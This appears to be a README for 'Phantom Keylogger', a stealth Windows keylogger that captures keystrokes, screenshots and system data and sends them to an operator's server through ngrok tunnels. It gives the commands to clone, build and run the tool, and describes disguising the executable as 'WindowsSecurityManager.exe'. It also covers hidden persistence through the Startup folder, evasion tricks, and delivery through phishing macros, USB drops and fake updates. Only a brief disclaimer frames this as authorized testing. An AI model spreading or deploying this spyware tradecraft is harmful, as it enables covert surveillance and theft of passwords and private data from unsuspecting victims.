Phantom Keylogger is an advanced, stealth-enabled keystroke and visual intelligence gathering system. Built with operational security as the primary objective, this tool provides persistent surveillance capabilities while maintaining minimal footprint on target systems.
THIS TOOL IS STRICTLY FOR:
- Authorized penetration testing
- Red team exercises with written permission
- Educational security research
- Corporate security assessments with proper authorization
STRICTLY PROHIBITED FOR:
- Unauthorized surveillance
- Illegal hacking activities
- Personal data theft
- Any malicious purposes
USERS ASSUME FULL LEGAL RESPONSIBILITY FOR PROPER USAGE
- Keystroke Logging: Advanced keyboard capture with special key translation
- Visual Surveillance: Automated screenshot capture at configurable intervals
- System Intelligence: Hostname, username, and environment data collection
- Persistent Operations: Continuous monitoring with automatic recovery
- Zero UI Footprint: Completely invisible to end users
- Persistence Mechanisms: Automatic startup installation
- Anti-Analysis: Mutex-based single instance protection
- File System Stealth: Hidden file attributes and obfuscated naming
- Network Camouflage: Secure communication through ngrok tunnels
# 1. Clone operational repository
git clone https://github.com/MattiaAlessi/phantom-keylogger
cd phantom-keylogger
# 2. Install operational dependencies
pip install -r requirements.txt
# 3. Deploy C2 server
python server.py# Generate stealth executable
python build.pyOutput: dist/WindowsSecurityManager.exe
Delivery Methods:
- Phishing Campaigns: Document macros or fake installers
- Physical Access: USB drop attacks
- Lateral Movement: Compromised internal shares
- Social Engineering: Fake software updates
# Start the GUI interface
python manager.pyβββββββββββββββββββ ββββββββββββββββββββ βββββββββββββββββββ
β TARGET β β C2 TUNNEL β β OPERATOR β
β β β β β β
β ββββββββββββββββ β βββββββββββββββ β β ββββββββββββββββ
β β Stealth ββ β β Ngrok β β β β Management ββ
β β Keylogger βββββββββΊβ Tunnel βββββββββΊβ Console ββ
β β ββ β β β β β β ββ
β ββββββββββββββββ β βββββββββββββββ β β ββββββββββββββββ
βββββββββββββββββββ ββββββββββββββββββββ βββββββββββββββββββ
Startup Folder: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\
Easily accessible by digiting shell:startup in the dialog box (WIN+r)
File Name: WindowsSecurityManager.exe
Attributes: Hidden system file
- Legitimate Naming: Uses Windows security-related names
- Behavioral Obfuscation: Normal system process patterns
- Network Blending: HTTPS traffic to legitimate-looking domains
- Memory Operations: No suspicious API calls or injection
- No Disk Writes: All data transmitted remotely
- Standard Libraries: Only common Python libraries used
- Clean Exit Procedures: No crash dumps or error reports